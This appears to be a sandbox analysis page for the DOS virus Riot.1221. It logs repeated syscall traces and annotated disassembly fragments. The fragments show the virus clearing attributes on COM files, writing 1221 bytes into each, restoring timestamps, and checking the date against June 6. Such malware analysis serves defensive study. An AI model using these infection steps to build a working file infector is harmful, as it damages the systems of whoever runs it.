Sample viewer

vx.netlux.org/Virus.DOS.Riot.1221


Syscalls:

Time | Syscall Op (INT 21h function number in AH, decimal) | PC (return address after the int 0x21) | Syscall Name
2018-12-17T22:44:08.044049375Z 71 PC: 12b37 | Get current directory
2018-12-17T22:44:08.047817333Z 59 PC: 12b43 | Change current directory
2018-12-17T22:44:08.052246524Z 26 PC: 12bf8 | Set disk transfer address
2018-12-17T22:44:08.05326705Z 78 PC: 12c06 | Find first file
2018-12-17T22:44:08.059685458Z 61 PC: 12c31 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:44:08.065967055Z 63 PC: 12c43 | Read file or device (Read 8 bytes on handle 5)
; Code at the return address of the Get time call (INT 21h AH=2Ch returns DH = seconds, DL = hundredths).
; It derives a byte from the clock, then clears the target file's attributes and reopens it read/write,
; which is the step before the file writes logged next.
2018-12-17T22:44:08.072249187Z 44 PC: 12cae | Get time 0x12cae: add dl, dh  ; dl = hundredths + seconds
0x12cb0: je 0x12caa  ; sum is zero: branch back to 0x12caa (before this excerpt; presumably retries the time call)
0x12cb2: mov si, 0x115
0x12cb5: add si, word ptr [0x106]  ; si = 0x115 + word at [0x106]; NOTE(review): looks like a relocation base, confirm
0x12cb9: mov byte ptr [si], dl  ; store the clock-derived byte; NOTE(review): presumably a per-copy key or marker, its consumer is not shown
0x12cbb: mov ax, 0x4301  ; AX=4301h: set file attributes
0x12cbe: xor cx, cx  ; CX = 0 clears every attribute, read-only included
0x12cc0: mov dx, si
0x12cc2: add dx, 0xbc  ; DS:DX = si + 0xbc, the path argument of the call
0x12cc6: int 0x21  ; logged as op 67 at PC 12cc8 (the logged PC is the address after the int)
0x12cc8: mov ah, 0x3e  ; AH=3Eh: close the handle in BX (BX is set outside this excerpt)
0x12cca: int 0x21
0x12ccc: mov ax, 0x3d02  ; AH=3Dh open, AL=02h read/write access
0x12ccf: int 0x21
0x12cd1: jae 0x12cd6  ; carry clear: the open succeeded
0x12cd3: jmp 0x12c52  ; open failed: leave this path (target not shown)
0x12cd6: mov di, dx
0x12cd8: add di, 0x62
0x12cdc: stosw word ptr es:[di], ax  ; save the new handle at es:[dx + 0x62]
0x12cdd: xchg ax, bx  ; BX = handle for the calls that follow
2018-12-17T22:44:08.075028053Z 67 PC: 12cc8 | Get or set file attributes
2018-12-17T22:44:08.092015458Z 62 PC: 12ccc | Close file
2018-12-17T22:44:08.093934664Z 61 PC: 12cd1 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:44:08.113936Z 64 PC: 12ce8 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:44:08.12076959Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-17T22:44:08.123292915Z 64 PC: 12d10 | Write file or device (Write 2 bytes on handle 5)
2018-12-17T22:44:08.125724118Z 66 PC: 12d19 | Move file pointer
2018-12-17T22:44:08.128181746Z 64 PC: 12a84 | Write file or device (Write 1221 bytes on handle 5)
2018-12-17T22:44:08.319346212Z 87 PC: 12d33 | Get or set file date and time
2018-12-17T22:44:08.321266737Z 62 PC: 12d37 | Close file
2018-12-17T22:44:08.44289347Z 67 PC: 12d4a | Get or set file attributes
2018-12-17T22:44:08.452602841Z 79 PC: 12c19 | Find next file
2018-12-17T22:44:08.455136336Z 61 PC: 12c31 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:44:08.462619123Z 63 PC: 12c43 | Read file or device (Read 8 bytes on handle 5)
; Code at the return address of the Get time call (INT 21h AH=2Ch returns DH = seconds, DL = hundredths).
; It derives a byte from the clock, then clears the target file's attributes and reopens it read/write,
; which is the step before the file writes logged next.
2018-12-17T22:44:08.469312318Z 44 PC: 12cae | Get time 0x12cae: add dl, dh  ; dl = hundredths + seconds
0x12cb0: je 0x12caa  ; sum is zero: branch back to 0x12caa (before this excerpt; presumably retries the time call)
0x12cb2: mov si, 0x115
0x12cb5: add si, word ptr [0x106]  ; si = 0x115 + word at [0x106]; NOTE(review): looks like a relocation base, confirm
0x12cb9: mov byte ptr [si], dl  ; store the clock-derived byte; NOTE(review): presumably a per-copy key or marker, its consumer is not shown
0x12cbb: mov ax, 0x4301  ; AX=4301h: set file attributes
0x12cbe: xor cx, cx  ; CX = 0 clears every attribute, read-only included
0x12cc0: mov dx, si
0x12cc2: add dx, 0xbc  ; DS:DX = si + 0xbc, the path argument of the call
0x12cc6: int 0x21  ; logged as op 67 at PC 12cc8 (the logged PC is the address after the int)
0x12cc8: mov ah, 0x3e  ; AH=3Eh: close the handle in BX (BX is set outside this excerpt)
0x12cca: int 0x21
0x12ccc: mov ax, 0x3d02  ; AH=3Dh open, AL=02h read/write access
0x12ccf: int 0x21
0x12cd1: jae 0x12cd6  ; carry clear: the open succeeded
0x12cd3: jmp 0x12c52  ; open failed: leave this path (target not shown)
0x12cd6: mov di, dx
0x12cd8: add di, 0x62
0x12cdc: stosw word ptr es:[di], ax  ; save the new handle at es:[dx + 0x62]
0x12cdd: xchg ax, bx  ; BX = handle for the calls that follow
2018-12-17T22:44:08.471323019Z 67 PC: 12cc8 | Get or set file attributes
2018-12-17T22:44:08.482541841Z 62 PC: 12ccc | Close file
2018-12-17T22:44:08.484166576Z 61 PC: 12cd1 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:44:08.49080624Z 64 PC: 12ce8 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:44:08.494655988Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-17T22:44:08.497258387Z 64 PC: 12d10 | Write file or device (Write 2 bytes on handle 5)
2018-12-17T22:44:08.499775355Z 66 PC: 12d19 | Move file pointer
2018-12-17T22:44:08.501826014Z 64 PC: 12a84 | Write file or device (Write 1221 bytes on handle 5)
2018-12-17T22:44:08.511222483Z 87 PC: 12d33 | Get or set file date and time
2018-12-17T22:44:08.512738135Z 62 PC: 12d37 | Close file
2018-12-17T22:44:08.521416191Z 67 PC: 12d4a | Get or set file attributes
2018-12-17T22:44:08.538634671Z 79 PC: 12c19 | Find next file
2018-12-17T22:44:08.555792698Z 61 PC: 12c31 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:44:08.56062665Z 63 PC: 12c43 | Read file or device (Read 8 bytes on handle 5)
; Code at the return address of the Get time call (INT 21h AH=2Ch returns DH = seconds, DL = hundredths).
; It derives a byte from the clock, then clears the target file's attributes and reopens it read/write,
; which is the step before the file writes logged next.
2018-12-17T22:44:08.565756582Z 44 PC: 12cae | Get time 0x12cae: add dl, dh  ; dl = hundredths + seconds
0x12cb0: je 0x12caa  ; sum is zero: branch back to 0x12caa (before this excerpt; presumably retries the time call)
0x12cb2: mov si, 0x115
0x12cb5: add si, word ptr [0x106]  ; si = 0x115 + word at [0x106]; NOTE(review): looks like a relocation base, confirm
0x12cb9: mov byte ptr [si], dl  ; store the clock-derived byte; NOTE(review): presumably a per-copy key or marker, its consumer is not shown
0x12cbb: mov ax, 0x4301  ; AX=4301h: set file attributes
0x12cbe: xor cx, cx  ; CX = 0 clears every attribute, read-only included
0x12cc0: mov dx, si
0x12cc2: add dx, 0xbc  ; DS:DX = si + 0xbc, the path argument of the call
0x12cc6: int 0x21  ; logged as op 67 at PC 12cc8 (the logged PC is the address after the int)
0x12cc8: mov ah, 0x3e  ; AH=3Eh: close the handle in BX (BX is set outside this excerpt)
0x12cca: int 0x21
0x12ccc: mov ax, 0x3d02  ; AH=3Dh open, AL=02h read/write access
0x12ccf: int 0x21
0x12cd1: jae 0x12cd6  ; carry clear: the open succeeded
0x12cd3: jmp 0x12c52  ; open failed: leave this path (target not shown)
0x12cd6: mov di, dx
0x12cd8: add di, 0x62
0x12cdc: stosw word ptr es:[di], ax  ; save the new handle at es:[dx + 0x62]
0x12cdd: xchg ax, bx  ; BX = handle for the calls that follow
2018-12-17T22:44:08.567549843Z 67 PC: 12cc8 | Get or set file attributes
2018-12-17T22:44:08.576450448Z 62 PC: 12ccc | Close file
2018-12-17T22:44:08.579348063Z 61 PC: 12cd1 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:44:08.586462421Z 64 PC: 12ce8 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:44:08.589471552Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-17T22:44:08.593792113Z 64 PC: 12d10 | Write file or device (Write 2 bytes on handle 5)
2018-12-17T22:44:08.596266639Z 66 PC: 12d19 | Move file pointer
2018-12-17T22:44:08.598159033Z 64 PC: 12a84 | Write file or device (Write 1221 bytes on handle 5)
2018-12-17T22:44:08.614203144Z 87 PC: 12d33 | Get or set file date and time
2018-12-17T22:44:08.615762378Z 62 PC: 12d37 | Close file
2018-12-17T22:44:08.624260536Z 67 PC: 12d4a | Get or set file attributes
; Code at the return address of the Get date call (INT 21h AH=2Ah returns DH = month, DL = day).
; Execution leaves this listing at one of the two jmp instructions; the lines after 0x12b69 are a
; linear sweep of the bytes that follow. A date-gated branch is only exercised when the analysis
; clock is set to the matching day, so a single run does not show it.
2018-12-17T22:44:08.636074418Z 42 PC: 12b60 | Get date 0x12b60: cmp dx, 0x606  ; DX == 0x0606 means month 6, day 6
0x12b64: je 0x12b69  ; date matches: go on to 0x12d4f (not shown; presumably the date-triggered routine)
0x12b66: jmp 0x12dba  ; any other date: continue at 0x12dba; the next logged call is at PC 12dc5, so this run took this path
0x12b69: jmp 0x12d4f
0x12b6c: and ah, bh  ; NOTE(review): 0x12b6c-0x12b77 is probably data decoded as instructions
0x12b6e: movsw word ptr es:[di], word ptr [si]
0x12b6f: mov ax, 0x5c4c
0x12b72: add word ptr [di], ax
0x12b74: add byte ptr [di - 0x75], dl  ; bytes 00 55 8B, with EC below: also readable as a data byte, then push bp / mov bp, sp
0x12b77: in al, dx
0x12b78: sub sp, 0x2c  ; reserve 0x2c bytes of stack locals
0x12b7b: push si
0x12b7c: jmp 0x12bed
0x12b7e: mov ah, 0x1a  ; AH=1Ah: set disk transfer address
0x12b80: lea dx, word ptr [bp - 0x2c]  ; DTA = the 0x2c-byte stack buffer
0x12b83: int 0x21
0x12b85: mov ah, 0x4e  ; AH=4Eh: find first file
0x12b87: mov cx, 0x10  ; attribute mask 0x10 includes directories in the search
0x12b8a: mov dx, 0x1aa
0x12b8d: add dx, word ptr [0x106]  ; DS:DX = 0x1aa + word at [0x106], the search pattern (string not shown)
2018-12-17T22:44:08.63854939Z 59 PC: 12dc5 | Change current directory
2018-12-17T22:44:08.642993498Z 59 PC: 12dcd | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8112,"SideJobID":0}


Syscalls:

Time | Syscall Op (INT 21h function number in AH, decimal) | PC (return address after the int 0x21) | Syscall Name
2018-12-25T12:03:27.708817691Z 71 PC: 12b37 | Get current directory
2018-12-25T12:03:27.712414386Z 59 PC: 12b43 | Change current directory
2018-12-25T12:03:27.716617112Z 26 PC: 12bf8 | Set disk transfer address
2018-12-25T12:03:27.717428972Z 78 PC: 12c06 | Find first file
2018-12-25T12:03:27.72131883Z 61 PC: 12c31 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:27.725739646Z 63 PC: 12c43 | Read file or device (Read 8 bytes on handle 5)
; Code at the return address of the Get time call (INT 21h AH=2Ch returns DH = seconds, DL = hundredths).
; It derives a byte from the clock, then clears the target file's attributes and reopens it read/write,
; which is the step before the file writes logged next.
2018-12-25T12:03:27.732763199Z 44 PC: 12cae | Get time 0x12cae: add dl, dh  ; dl = hundredths + seconds
0x12cb0: je 0x12caa  ; sum is zero: branch back to 0x12caa (before this excerpt; presumably retries the time call)
0x12cb2: mov si, 0x115
0x12cb5: add si, word ptr [0x106]  ; si = 0x115 + word at [0x106]; NOTE(review): looks like a relocation base, confirm
0x12cb9: mov byte ptr [si], dl  ; store the clock-derived byte; NOTE(review): presumably a per-copy key or marker, its consumer is not shown
0x12cbb: mov ax, 0x4301  ; AX=4301h: set file attributes
0x12cbe: xor cx, cx  ; CX = 0 clears every attribute, read-only included
0x12cc0: mov dx, si
0x12cc2: add dx, 0xbc  ; DS:DX = si + 0xbc, the path argument of the call
0x12cc6: int 0x21  ; logged as op 67 at PC 12cc8 (the logged PC is the address after the int)
0x12cc8: mov ah, 0x3e  ; AH=3Eh: close the handle in BX (BX is set outside this excerpt)
0x12cca: int 0x21
0x12ccc: mov ax, 0x3d02  ; AH=3Dh open, AL=02h read/write access
0x12ccf: int 0x21
0x12cd1: jae 0x12cd6  ; carry clear: the open succeeded
0x12cd3: jmp 0x12c52  ; open failed: leave this path (target not shown)
0x12cd6: mov di, dx
0x12cd8: add di, 0x62
0x12cdc: stosw word ptr es:[di], ax  ; save the new handle at es:[dx + 0x62]
0x12cdd: xchg ax, bx  ; BX = handle for the calls that follow
2018-12-25T12:03:27.734843444Z 67 PC: 12cc8 | Get or set file attributes
2018-12-25T12:03:28.628718284Z 62 PC: 12ccc | Close file
2018-12-25T12:03:28.630830308Z 61 PC: 12cd1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:28.638206528Z 64 PC: 12ce8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:03:28.646665088Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:28.649880805Z 64 PC: 12d10 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:28.652883555Z 66 PC: 12d19 | Move file pointer
2018-12-25T12:03:28.656416027Z 64 PC: 12a84 | Write file or device (Write 1221 bytes on handle 5)
2018-12-25T12:03:28.666935265Z 87 PC: 12d33 | Get or set file date and time
2018-12-25T12:03:28.668574778Z 62 PC: 12d37 | Close file
2018-12-25T12:03:28.683262266Z 67 PC: 12d4a | Get or set file attributes
2018-12-25T12:03:28.694617245Z 79 PC: 12c19 | Find next file
2018-12-25T12:03:28.69906329Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:28.70762993Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:28.715195524Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:28.718203925Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:28.730747582Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:28.734030751Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:28.741752234Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:28.745656893Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:28.749547342Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:28.752450927Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:28.754539988Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:28.780563645Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:28.782523575Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:28.791487954Z 67 PC: 12d4a | Get or set file attributes (See above)
2018-12-25T12:03:28.824590862Z 79 PC: 12c19 | Find next file (See above)
2018-12-25T12:03:28.82696713Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:28.834972225Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:28.844093206Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:28.846547846Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:28.859032362Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:28.862213672Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:28.87137708Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:28.875033156Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:28.878255751Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:28.881494984Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:28.883490099Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:28.893743677Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:28.895959404Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:28.904081996Z 67 PC: 12d4a | Get or set file attributes (See above)
; Code at the return address of the Get date call (INT 21h AH=2Ah returns DH = month, DL = day).
; Execution leaves this listing at one of the two jmp instructions; the lines after 0x12b69 are a
; linear sweep of the bytes that follow. A date-gated branch is only exercised when the analysis
; clock is set to the matching day, so a single run does not show it.
2018-12-25T12:03:28.915303352Z 42 PC: 12b60 | Get date 0x12b60: cmp dx, 0x606  ; DX == 0x0606 means month 6, day 6
0x12b64: je 0x12b69  ; date matches: go on to 0x12d4f (not shown; presumably the date-triggered routine)
0x12b66: jmp 0x12dba  ; any other date: continue at 0x12dba; the next logged call is at PC 12dc5, so this run took this path
0x12b69: jmp 0x12d4f
0x12b6c: and ah, bh  ; NOTE(review): 0x12b6c-0x12b77 is probably data decoded as instructions
0x12b6e: movsw word ptr es:[di], word ptr [si]
0x12b6f: mov ax, 0x5c4c
0x12b72: add word ptr [di], ax
0x12b74: add byte ptr [di - 0x75], dl  ; bytes 00 55 8B, with EC below: also readable as a data byte, then push bp / mov bp, sp
0x12b77: in al, dx
0x12b78: sub sp, 0x2c  ; reserve 0x2c bytes of stack locals
0x12b7b: push si
0x12b7c: jmp 0x12bed
0x12b7e: mov ah, 0x1a  ; AH=1Ah: set disk transfer address
0x12b80: lea dx, word ptr [bp - 0x2c]  ; DTA = the 0x2c-byte stack buffer
0x12b83: int 0x21
0x12b85: mov ah, 0x4e  ; AH=4Eh: find first file
0x12b87: mov cx, 0x10  ; attribute mask 0x10 includes directories in the search
0x12b8a: mov dx, 0x1aa
0x12b8d: add dx, word ptr [0x106]  ; DS:DX = 0x1aa + word at [0x106], the search pattern (string not shown)
2018-12-25T12:03:28.918371168Z 59 PC: 12dc5 | Change current directory
2018-12-25T12:03:28.923112863Z 59 PC: 12dcd | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8112,"SideJobID":0}


Syscalls:

Time | Syscall Op (INT 21h function number in AH, decimal) | PC (return address after the int 0x21) | Syscall Name
2018-12-25T12:03:27.902072923Z 71 PC: 12b37 | Get current directory
2018-12-25T12:03:27.905335239Z 59 PC: 12b43 | Change current directory
2018-12-25T12:03:27.909360353Z 26 PC: 12bf8 | Set disk transfer address
2018-12-25T12:03:27.910348151Z 78 PC: 12c06 | Find first file
2018-12-25T12:03:27.921557715Z 61 PC: 12c31 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:27.932964863Z 63 PC: 12c43 | Read file or device (Read 8 bytes on handle 5)
; Code at the return address of the Get time call (INT 21h AH=2Ch returns DH = seconds, DL = hundredths).
; It derives a byte from the clock, then clears the target file's attributes and reopens it read/write,
; which is the step before the file writes logged next.
2018-12-25T12:03:27.944581798Z 44 PC: 12cae | Get time 0x12cae: add dl, dh  ; dl = hundredths + seconds
0x12cb0: je 0x12caa  ; sum is zero: branch back to 0x12caa (before this excerpt; presumably retries the time call)
0x12cb2: mov si, 0x115
0x12cb5: add si, word ptr [0x106]  ; si = 0x115 + word at [0x106]; NOTE(review): looks like a relocation base, confirm
0x12cb9: mov byte ptr [si], dl  ; store the clock-derived byte; NOTE(review): presumably a per-copy key or marker, its consumer is not shown
0x12cbb: mov ax, 0x4301  ; AX=4301h: set file attributes
0x12cbe: xor cx, cx  ; CX = 0 clears every attribute, read-only included
0x12cc0: mov dx, si
0x12cc2: add dx, 0xbc  ; DS:DX = si + 0xbc, the path argument of the call
0x12cc6: int 0x21  ; logged as op 67 at PC 12cc8 (the logged PC is the address after the int)
0x12cc8: mov ah, 0x3e  ; AH=3Eh: close the handle in BX (BX is set outside this excerpt)
0x12cca: int 0x21
0x12ccc: mov ax, 0x3d02  ; AH=3Dh open, AL=02h read/write access
0x12ccf: int 0x21
0x12cd1: jae 0x12cd6  ; carry clear: the open succeeded
0x12cd3: jmp 0x12c52  ; open failed: leave this path (target not shown)
0x12cd6: mov di, dx
0x12cd8: add di, 0x62
0x12cdc: stosw word ptr es:[di], ax  ; save the new handle at es:[dx + 0x62]
0x12cdd: xchg ax, bx  ; BX = handle for the calls that follow
2018-12-25T12:03:27.947600058Z 67 PC: 12cc8 | Get or set file attributes
2018-12-25T12:03:27.972817168Z 62 PC: 12ccc | Close file
2018-12-25T12:03:27.974578373Z 61 PC: 12cd1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:27.981736242Z 64 PC: 12ce8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:03:27.984878222Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:27.98767371Z 64 PC: 12d10 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:27.991366027Z 66 PC: 12d19 | Move file pointer
2018-12-25T12:03:27.993355289Z 64 PC: 12a84 | Write file or device (Write 1221 bytes on handle 5)
2018-12-25T12:03:27.999671814Z 87 PC: 12d33 | Get or set file date and time
2018-12-25T12:03:28.001260205Z 62 PC: 12d37 | Close file
2018-12-25T12:03:28.009146344Z 67 PC: 12d4a | Get or set file attributes
2018-12-25T12:03:28.018925016Z 79 PC: 12c19 | Find next file
2018-12-25T12:03:28.021482882Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:28.028813269Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:28.035261261Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:28.03741264Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:28.047648911Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:28.049266683Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:28.060941083Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:28.067517234Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:28.069212146Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:28.074865877Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:28.07758969Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:28.083333384Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:28.084545494Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:28.091116819Z 67 PC: 12d4a | Get or set file attributes (See above)
2018-12-25T12:03:28.097351973Z 79 PC: 12c19 | Find next file (See above)
2018-12-25T12:03:28.099218903Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:28.104042512Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:28.108600301Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:28.110456852Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:28.121662328Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:28.123467311Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:28.130858786Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:28.143184175Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:28.146047625Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:28.148857376Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:28.151672928Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:28.160976791Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:28.162478519Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:28.170268394Z 67 PC: 12d4a | Get or set file attributes (See above)
; Code at the return address of the Get date call (INT 21h AH=2Ah returns DH = month, DL = day).
; Execution leaves this listing at one of the two jmp instructions; the lines after 0x12b69 are a
; linear sweep of the bytes that follow. A date-gated branch is only exercised when the analysis
; clock is set to the matching day, so a single run does not show it.
2018-12-25T12:03:28.180893622Z 42 PC: 12b60 | Get date 0x12b60: cmp dx, 0x606  ; DX == 0x0606 means month 6, day 6
0x12b64: je 0x12b69  ; date matches: go on to 0x12d4f (not shown; presumably the date-triggered routine)
0x12b66: jmp 0x12dba  ; any other date: continue at 0x12dba; the next logged call is at PC 12dc5, so this run took this path
0x12b69: jmp 0x12d4f
0x12b6c: and ah, bh  ; NOTE(review): 0x12b6c-0x12b77 is probably data decoded as instructions
0x12b6e: movsw word ptr es:[di], word ptr [si]
0x12b6f: mov ax, 0x5c4c
0x12b72: add word ptr [di], ax
0x12b74: add byte ptr [di - 0x75], dl  ; bytes 00 55 8B, with EC below: also readable as a data byte, then push bp / mov bp, sp
0x12b77: in al, dx
0x12b78: sub sp, 0x2c  ; reserve 0x2c bytes of stack locals
0x12b7b: push si
0x12b7c: jmp 0x12bed
0x12b7e: mov ah, 0x1a  ; AH=1Ah: set disk transfer address
0x12b80: lea dx, word ptr [bp - 0x2c]  ; DTA = the 0x2c-byte stack buffer
0x12b83: int 0x21
0x12b85: mov ah, 0x4e  ; AH=4Eh: find first file
0x12b87: mov cx, 0x10  ; attribute mask 0x10 includes directories in the search
0x12b8a: mov dx, 0x1aa
0x12b8d: add dx, word ptr [0x106]  ; DS:DX = 0x1aa + word at [0x106], the search pattern (string not shown)
2018-12-25T12:03:28.183425302Z 59 PC: 12dc5 | Change current directory
2018-12-25T12:03:28.187688336Z 59 PC: 12dcd | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8112,"SideJobID":0}


Syscalls:

Time | Syscall Op (INT 21h function number in AH, decimal) | PC (return address after the int 0x21) | Syscall Name
2018-12-25T12:03:28.052926805Z 71 PC: 12b37 | Get current directory
2018-12-25T12:03:28.056537646Z 59 PC: 12b43 | Change current directory
2018-12-25T12:03:28.060863611Z 26 PC: 12bf8 | Set disk transfer address
2018-12-25T12:03:28.06193608Z 78 PC: 12c06 | Find first file
2018-12-25T12:03:28.069305472Z 61 PC: 12c31 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:28.076581261Z 63 PC: 12c43 | Read file or device (Read 8 bytes on handle 5)
; Code at the return address of the Get time call (INT 21h AH=2Ch returns DH = seconds, DL = hundredths).
; It derives a byte from the clock, then clears the target file's attributes and reopens it read/write,
; which is the step before the file writes logged next.
2018-12-25T12:03:28.083369684Z 44 PC: 12cae | Get time 0x12cae: add dl, dh  ; dl = hundredths + seconds
0x12cb0: je 0x12caa  ; sum is zero: branch back to 0x12caa (before this excerpt; presumably retries the time call)
0x12cb2: mov si, 0x115
0x12cb5: add si, word ptr [0x106]  ; si = 0x115 + word at [0x106]; NOTE(review): looks like a relocation base, confirm
0x12cb9: mov byte ptr [si], dl  ; store the clock-derived byte; NOTE(review): presumably a per-copy key or marker, its consumer is not shown
0x12cbb: mov ax, 0x4301  ; AX=4301h: set file attributes
0x12cbe: xor cx, cx  ; CX = 0 clears every attribute, read-only included
0x12cc0: mov dx, si
0x12cc2: add dx, 0xbc  ; DS:DX = si + 0xbc, the path argument of the call
0x12cc6: int 0x21  ; logged as op 67 at PC 12cc8 (the logged PC is the address after the int)
0x12cc8: mov ah, 0x3e  ; AH=3Eh: close the handle in BX (BX is set outside this excerpt)
0x12cca: int 0x21
0x12ccc: mov ax, 0x3d02  ; AH=3Dh open, AL=02h read/write access
0x12ccf: int 0x21
0x12cd1: jae 0x12cd6  ; carry clear: the open succeeded
0x12cd3: jmp 0x12c52  ; open failed: leave this path (target not shown)
0x12cd6: mov di, dx
0x12cd8: add di, 0x62
0x12cdc: stosw word ptr es:[di], ax  ; save the new handle at es:[dx + 0x62]
0x12cdd: xchg ax, bx  ; BX = handle for the calls that follow
2018-12-25T12:03:28.085947553Z 67 PC: 12cc8 | Get or set file attributes
2018-12-25T12:03:28.627682554Z 62 PC: 12ccc | Close file
2018-12-25T12:03:28.630279144Z 61 PC: 12cd1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:28.646277416Z 64 PC: 12ce8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:03:28.654564433Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:28.657589798Z 64 PC: 12d10 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:28.660713972Z 66 PC: 12d19 | Move file pointer
2018-12-25T12:03:28.666149339Z 64 PC: 12a84 | Write file or device (Write 1221 bytes on handle 5)
2018-12-25T12:03:28.679917043Z 87 PC: 12d33 | Get or set file date and time
2018-12-25T12:03:28.681972752Z 62 PC: 12d37 | Close file
2018-12-25T12:03:28.692260962Z 67 PC: 12d4a | Get or set file attributes
2018-12-25T12:03:28.704122677Z 79 PC: 12c19 | Find next file
2018-12-25T12:03:28.707565785Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:28.716439343Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:28.724084828Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:28.727419935Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:28.739602104Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:28.74215545Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:28.74996322Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:28.753747671Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:28.757785071Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:28.760826872Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:28.76311406Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:28.774461512Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:28.776685665Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:28.785786131Z 67 PC: 12d4a | Get or set file attributes (See above)
2018-12-25T12:03:28.800059324Z 79 PC: 12c19 | Find next file (See above)
